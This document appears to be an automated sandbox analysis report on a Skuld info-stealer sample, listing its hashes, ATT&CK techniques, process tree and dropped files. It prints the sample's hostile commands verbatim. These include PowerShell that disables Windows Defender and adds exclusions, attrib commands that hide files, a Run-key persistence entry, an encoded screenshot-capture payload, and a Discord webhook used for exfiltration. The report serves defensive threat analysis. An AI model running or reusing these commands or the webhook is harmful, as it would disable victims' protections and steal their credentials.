skuld | c8b75435bb5a12a9394b187e861900f0898682ed1ad9bfcae19d43fd6ecaae1c

Analysis

max time kernel
150s
max time network
57s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
30-06-2024 07:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

skuld.exe
Size

14.2MB
MD5

bb5921e2714c9a4afd6c0aff97232bbf
SHA1

2bd83915a20790ccd72d478941d10deb6c5bb0dd
SHA256

c8b75435bb5a12a9394b187e861900f0898682ed1ad9bfcae19d43fd6ecaae1c
SHA512

c97a5152d68d2aee74eb5a69a9fe6cdda875ed614c44b21142a2a519a88d8f2239613b7de31c9201a184a62d6ec3096a45eb565976ab726078d6e42e4c5fa758
SSDEEP

196608:qFIAsZlG9mvLSbPpfrw1Hzhj3OTc6sB/0fSpwA:qFnsjaPOxhmcvES

Score

10^/10

skuld execution persistence privilege_escalation spyware stealer

Malware Config

Extracted

Family

skuld

https://discord.com/api/webhooks/1256865196069228615/QxBVP3EAM1JfTSfEhMwT_EexduQvdx1myuvzzU783TE_HbtKV3C_Y3TRq6y7AyBo5uRV

Signatures

Skuld stealer
An info stealer written in Go lang.
stealer skuld

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4656	powershell.exe
3100	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	skuld.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	skuld.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
2	discord.com
7	discord.com
11	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4420	wmic.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
4656	powershell.exe
2324	skuld.exe
2324	skuld.exe
4656	powershell.exe
2324	skuld.exe
2324	skuld.exe
2700	powershell.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2700	powershell.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe
2324	skuld.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2324	skuld.exe
Token: SeDebugPrivilege	4656	powershell.exe
Token: SeIncreaseQuotaPrivilege	5040	wmic.exe
Token: SeSecurityPrivilege	5040	wmic.exe
Token: SeTakeOwnershipPrivilege	5040	wmic.exe
Token: SeLoadDriverPrivilege	5040	wmic.exe
Token: SeSystemProfilePrivilege	5040	wmic.exe
Token: SeSystemtimePrivilege	5040	wmic.exe
Token: SeProfSingleProcessPrivilege	5040	wmic.exe
Token: SeIncBasePriorityPrivilege	5040	wmic.exe
Token: SeCreatePagefilePrivilege	5040	wmic.exe
Token: SeBackupPrivilege	5040	wmic.exe
Token: SeRestorePrivilege	5040	wmic.exe
Token: SeShutdownPrivilege	5040	wmic.exe
Token: SeDebugPrivilege	5040	wmic.exe
Token: SeSystemEnvironmentPrivilege	5040	wmic.exe
Token: SeRemoteShutdownPrivilege	5040	wmic.exe
Token: SeUndockPrivilege	5040	wmic.exe
Token: SeManageVolumePrivilege	5040	wmic.exe
Token: 33	5040	wmic.exe
Token: 34	5040	wmic.exe
Token: 35	5040	wmic.exe
Token: 36	5040	wmic.exe
Token: SeIncreaseQuotaPrivilege	5040	wmic.exe
Token: SeSecurityPrivilege	5040	wmic.exe
Token: SeTakeOwnershipPrivilege	5040	wmic.exe
Token: SeLoadDriverPrivilege	5040	wmic.exe
Token: SeSystemProfilePrivilege	5040	wmic.exe
Token: SeSystemtimePrivilege	5040	wmic.exe
Token: SeProfSingleProcessPrivilege	5040	wmic.exe
Token: SeIncBasePriorityPrivilege	5040	wmic.exe
Token: SeCreatePagefilePrivilege	5040	wmic.exe
Token: SeBackupPrivilege	5040	wmic.exe
Token: SeRestorePrivilege	5040	wmic.exe
Token: SeShutdownPrivilege	5040	wmic.exe
Token: SeDebugPrivilege	5040	wmic.exe
Token: SeSystemEnvironmentPrivilege	5040	wmic.exe
Token: SeRemoteShutdownPrivilege	5040	wmic.exe
Token: SeUndockPrivilege	5040	wmic.exe
Token: SeManageVolumePrivilege	5040	wmic.exe
Token: 33	5040	wmic.exe
Token: 34	5040	wmic.exe
Token: 35	5040	wmic.exe
Token: 36	5040	wmic.exe
Token: SeIncreaseQuotaPrivilege	2308	wmic.exe
Token: SeSecurityPrivilege	2308	wmic.exe
Token: SeTakeOwnershipPrivilege	2308	wmic.exe
Token: SeLoadDriverPrivilege	2308	wmic.exe
Token: SeSystemProfilePrivilege	2308	wmic.exe
Token: SeSystemtimePrivilege	2308	wmic.exe
Token: SeProfSingleProcessPrivilege	2308	wmic.exe
Token: SeIncBasePriorityPrivilege	2308	wmic.exe
Token: SeCreatePagefilePrivilege	2308	wmic.exe
Token: SeBackupPrivilege	2308	wmic.exe
Token: SeRestorePrivilege	2308	wmic.exe
Token: SeShutdownPrivilege	2308	wmic.exe
Token: SeDebugPrivilege	2308	wmic.exe
Token: SeSystemEnvironmentPrivilege	2308	wmic.exe
Token: SeRemoteShutdownPrivilege	2308	wmic.exe
Token: SeUndockPrivilege	2308	wmic.exe
Token: SeManageVolumePrivilege	2308	wmic.exe
Token: 33	2308	wmic.exe
Token: 34	2308	wmic.exe
Token: 35	2308	wmic.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2324 wrote to memory of 1352	2324	skuld.exe	82
PID 2324 wrote to memory of 1352	2324	skuld.exe	82
PID 2324 wrote to memory of 4656	2324	skuld.exe	83
PID 2324 wrote to memory of 4656	2324	skuld.exe	83
PID 2324 wrote to memory of 5040	2324	skuld.exe	84
PID 2324 wrote to memory of 5040	2324	skuld.exe	84
PID 2324 wrote to memory of 2308	2324	skuld.exe	86
PID 2324 wrote to memory of 2308	2324	skuld.exe	86
PID 2324 wrote to memory of 2700	2324	skuld.exe	87
PID 2324 wrote to memory of 2700	2324	skuld.exe	87
PID 2324 wrote to memory of 3724	2324	skuld.exe	88
PID 2324 wrote to memory of 3724	2324	skuld.exe	88
PID 2324 wrote to memory of 4420	2324	skuld.exe	89
PID 2324 wrote to memory of 4420	2324	skuld.exe	89
PID 2324 wrote to memory of 3304	2324	skuld.exe	90
PID 2324 wrote to memory of 3304	2324	skuld.exe	90
PID 2324 wrote to memory of 5080	2324	skuld.exe	91
PID 2324 wrote to memory of 5080	2324	skuld.exe	91
PID 2324 wrote to memory of 4032	2324	skuld.exe	92
PID 2324 wrote to memory of 4032	2324	skuld.exe	92
PID 2324 wrote to memory of 3876	2324	skuld.exe	94
PID 2324 wrote to memory of 3876	2324	skuld.exe	94
PID 2324 wrote to memory of 3100	2324	skuld.exe	95
PID 2324 wrote to memory of 3100	2324	skuld.exe	95
PID 3100 wrote to memory of 4168	3100	powershell.exe	96
PID 3100 wrote to memory of 4168	3100	powershell.exe	96
PID 4168 wrote to memory of 812	4168	csc.exe	97
PID 4168 wrote to memory of 812	4168	csc.exe	97

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1352	attrib.exe
3724	attrib.exe
5080	attrib.exe
4032	attrib.exe

C:\Users\Admin\AppData\Local\Temp\skuld.exe
"C:\Users\Admin\AppData\Local\Temp\skuld.exe"
1⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2324
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Local\Temp\skuld.exe
  2⤵
  - Views/modifies file attributes
  PID:1352
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\skuld.exe
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4656
- C:\Windows\System32\Wbem\wmic.exe
  wmic os get Caption
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5040
- C:\Windows\System32\Wbem\wmic.exe
  wmic cpu get Name
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2308
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2700
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
  2⤵
  - Views/modifies file attributes
  PID:3724
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:4420
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  PID:3304
- C:\Windows\system32\attrib.exe
  attrib -r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:5080
- C:\Windows\system32\attrib.exe
  attrib +r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:4032
- C:\Windows\system32\netsh.exe
  netsh wlan show profiles
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:3876
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of WriteProcessMemory
  PID:3100
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dryon4q1\dryon4q1.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4168
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8397.tmp" "c:\Users\Admin\AppData\Local\Temp\dryon4q1\CSC989BBE9D5F12492E87D79FFBEEB808B.TMP"
      4⤵
      PID:812

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9c740b7699e2363ac4ecdf496520ca35

SHA1
aa8691a8c56500d82c5fc8c35209bc6fe50ab1d9

SHA256
be96c91b62ba9ba7072ab89e66543328c9e4395150f9dbe8067332d94a3ecc61

SHA512
8885683f96353582eb871209e766e7eba1a72a2837ce27ea298b7b5b169621d1fa3fce25346b6bfd258b52642644234da9559d4e765a2023a5a5fc1f544cc7af

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8397.tmp

Filesize
1KB

MD5
32619a976c52f9f006529ba2e64103a0

SHA1
3540af7fcc32f87b9cfcc2aed3ebcb0a5a73ccab

SHA256
e6f4dabc0193a8bef4b7714d8dbfd9571b9c7b17901a77433cc75a2e2cddb0e1

SHA512
7526d7af7559fc61dcdc7a2c8f5951ef224050035772388f2a01f9a5c598c428b572cddc6f4796115bc1afd6b26b2a6bc49bb2b4273ba3a2890d02184189bf49

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3eh43mct.x4t.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dryon4q1\dryon4q1.dll

Filesize
4KB

MD5
1136b5be054bd6080b3e7360d09b4f60

SHA1
273061a19bdc6c6493b1e9cbf2f5969e2275df6a

SHA256
279488221f77e263754ed1df91fcd39235f2015f97cedb3017d5ebac6c2cd63b

SHA512
e1d9d965afae9383ababb68188ead00e2828a7936c5ccabf704931bfa2869ea0ec22ba9802a240eb95abc77b72c6d304fa6724aa716ca4b7bf323766f178f0a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\mZWBgldzg4\Display (1).png

Filesize
428KB

MD5
03149c7642caf707d73af2cd4d80dba1

SHA1
7569d14a35e066c9fa8b19444b4881e134ef3aca

SHA256
e59f1ea1717ae8416c0d5f4a616689f90b616dba4c642d91d317de28b880b16e

SHA512
60ed463c845f9d63c8712802109f12d31234b0cc6a03d8415290babef038d1503d51cfb957d20e80481050c6a959229cceb2beff114ba19a5892775aa31d7cb8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

Filesize
14.2MB

MD5
bb5921e2714c9a4afd6c0aff97232bbf

SHA1
2bd83915a20790ccd72d478941d10deb6c5bb0dd

SHA256
c8b75435bb5a12a9394b187e861900f0898682ed1ad9bfcae19d43fd6ecaae1c

SHA512
c97a5152d68d2aee74eb5a69a9fe6cdda875ed614c44b21142a2a519a88d8f2239613b7de31c9201a184a62d6ec3096a45eb565976ab726078d6e42e4c5fa758

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dryon4q1\CSC989BBE9D5F12492E87D79FFBEEB808B.TMP

Filesize
652B

MD5
dfbd8ecc17f8c91bd1d3b919f6038b48

SHA1
f84b57f56f795d5bc8cb690766e412e6735617ae

SHA256
16ba3e065c98e75a5cbeefeff473f19d5f662a3f6c2bb9aa30ba9c58e85067c6

SHA512
129367f788ecddbd5fd5913b3f234ebfeec8b5dd9cf04c1e1f8f89dcbc233d0dafb747fb2b729e774623dfebf866840ef0217395d4a8e448af858bd9265dbffd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dryon4q1\dryon4q1.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dryon4q1\dryon4q1.cmdline

Filesize
607B

MD5
137de5867e17e936ecc539cdfc0f89c4

SHA1
90058751f241694179377bf5682a5e6e37a91398

SHA256
a344cf80bfea2534b3c4c5022c60b0aa6c7cd33fda8e526b2b060078177e24b8

SHA512
3a9f4e32cbd6c6534ba2d18ca6af0f42832e06bf88e3cbc33de0dd5afa07ed34bf523acd7ce25ab62df9e2deb10f832df7a8f719655e312bc6cc2983eee9a5af

Download Submit
memory/3100-60-0x0000026372A70000-0x0000026372A78000-memory.dmp

Filesize
32KB

Download
memory/4656-0-0x00007FFFE9CF3000-0x00007FFFE9CF5000-memory.dmp

Filesize
8KB

Download
memory/4656-15-0x00007FFFE9CF0000-0x00007FFFEA7B1000-memory.dmp

Filesize
10.8MB

Download
memory/4656-12-0x00007FFFE9CF0000-0x00007FFFEA7B1000-memory.dmp

Filesize
10.8MB

Download
memory/4656-11-0x00007FFFE9CF0000-0x00007FFFEA7B1000-memory.dmp

Filesize
10.8MB

Download
memory/4656-10-0x00000294D3AB0000-0x00000294D3AD2000-memory.dmp

Filesize
136KB

Download